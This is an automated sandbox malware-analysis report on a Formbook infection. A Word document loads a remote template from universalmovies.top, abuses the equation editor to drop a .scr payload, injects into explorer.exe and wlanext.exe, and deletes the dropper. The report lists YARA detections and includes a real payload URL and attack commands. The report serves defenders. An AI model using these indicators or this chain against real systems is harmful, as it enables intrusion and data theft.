      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: nelb82019.scr PID: 3216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: nelb82019.scr PID: 3248, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: wlanext.exe PID: 3372, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.nelb82019.scr.860000.1.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
      Source: 10.2.nelb82019.scr.860000.1.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@10/19@27/10
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0359A memset,LookupPrivilegeValueW,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,14_2_00C0359A
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$der-1351125X.docx.docJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8D41.tmpJump to behavior
      Source: Order-1351125X.docx.docOLE indicator, Word Document stream: true
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Order-1351125X.docx.docReversingLabs: Detection: 31%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\nelb82019.scr"
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\nelb82019.scr"Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: wow64win.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: bcrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: wow64win.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
      Source: Order-1351125X.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Order-1351125X.docx.doc
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Order-1351125X.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: nelb82019.scr, 0000000A.00000002.400627339.0000000000400000.00000004.08000000.00040000.00000000.sdmp, nelb82019.scr, 0000000A.00000002.403235071.0000000002241000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: nelb82019.scr, nelb82019.scr, 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000002.923627309.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000003.410817092.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000003.411178144.0000000000A40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wlanext.pdb source: nelb82019.scr, 0000000B.00000002.410869004.0000000000544000.00000004.00000020.00020000.00000000.sdmp, nelb82019.scr, 0000000B.00000002.410776116.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
      Source: Order-1351125X.docx.docInitial sample: OLE indicators vbamacros = False
      Source: nelb[1].scr.9.drStatic PE information: 0xD91CB953 [Tue Jun 5 00:12:03 2085 UTC]
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005C5357 push ecx; ret 9_2_005C535B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005C534F push ecx; ret 9_2_005C5353
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005C5342 push ecx; ret 9_2_005C534B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005B9170 push eax; retf 9_2_005B9171
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005C5310 push ecx; ret 9_2_005C5313
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005BA5C0 push eax; retn 005Bh9_2_005BA5C1
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005B01F4 push eax; retf 9_2_005B01F5
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0092DFA1 push ecx; ret 11_2_0092DFB4
      Source: C:\Windows\explorer.exeCode function: 13_2_081F19B5 push esp; retn 0000h13_2_081F1AE7
      Source: C:\Windows\explorer.exeCode function: 13_2_081F1B1E push esp; retn 0000h13_2_081F1B1F
      Source: C:\Windows\explorer.exeCode function: 13_2_081F1B02 push esp; retn 0000h13_2_081F1B03
      Source: C:\Windows\explorer.exeCode function: 13_2_08D659B5 push esp; retn 0000h13_2_08D65AE7
      Source: C:\Windows\explorer.exeCode function: 13_2_08D65B1E push esp; retn 0000h13_2_08D65B1F
      Source: C:\Windows\explorer.exeCode function: 13_2_08D65B02 push esp; retn 0000h13_2_08D65B03
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C08F09 push ecx; ret 14_2_00C08F1C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0204DFA1 push ecx; ret 14_2_0204DFB4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_000979C8 push es; retf 14_2_000979C9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00090B2E push edx; retf 14_2_00090B2F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009D495 push eax; ret 14_2_0009D4E8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009D4EB push eax; ret 14_2_0009D552
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009D4E2 push eax; ret 14_2_0009D4E8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009D54C push eax; ret 14_2_0009D552
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00087D65 push esi; iretd 14_2_00087D68
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_000965BD push esi; retf 14_2_000965BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009DEA8 push ebp; iretd 14_2_0009DEAB
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4E9B5 push esp; retn 0000h14_2_00A4EAE7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4EB02 push esp; retn 0000h14_2_00A4EB03
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4EB1E push esp; retn 0000h14_2_00A4EB1F
      Source: nelb[1].scr.9.drStatic PE information: section name: .text entropy: 7.407542787832779
      Source: nelb82019.scr.9.drStatic PE information: section name: .text entropy: 7.407542787832779

      Persistence and Installation Behavior

      barindex
      Microsoft Office launches external ms-search protocol handler (WebDAV)
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\universalmovies.top@SSL\DavWWWRootJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\universalmovies.top@SSL\DavWWWRootJump to behavior
      Contains an external reference to another file
      Source: settings.xml.relsExtracted files from sample: https://universalmovies.top/nelb.doc
      Drops PE files with a suspicious file extension
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\nelb82019.scrJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scrJump to dropped file
      Office drops RTF file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: nelb[1].doc.0.drJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 497AF0F0.doc.0.drJump to dropped file
      Office viewer loads remote template
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\nelb82019.scrJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scrJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEB
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
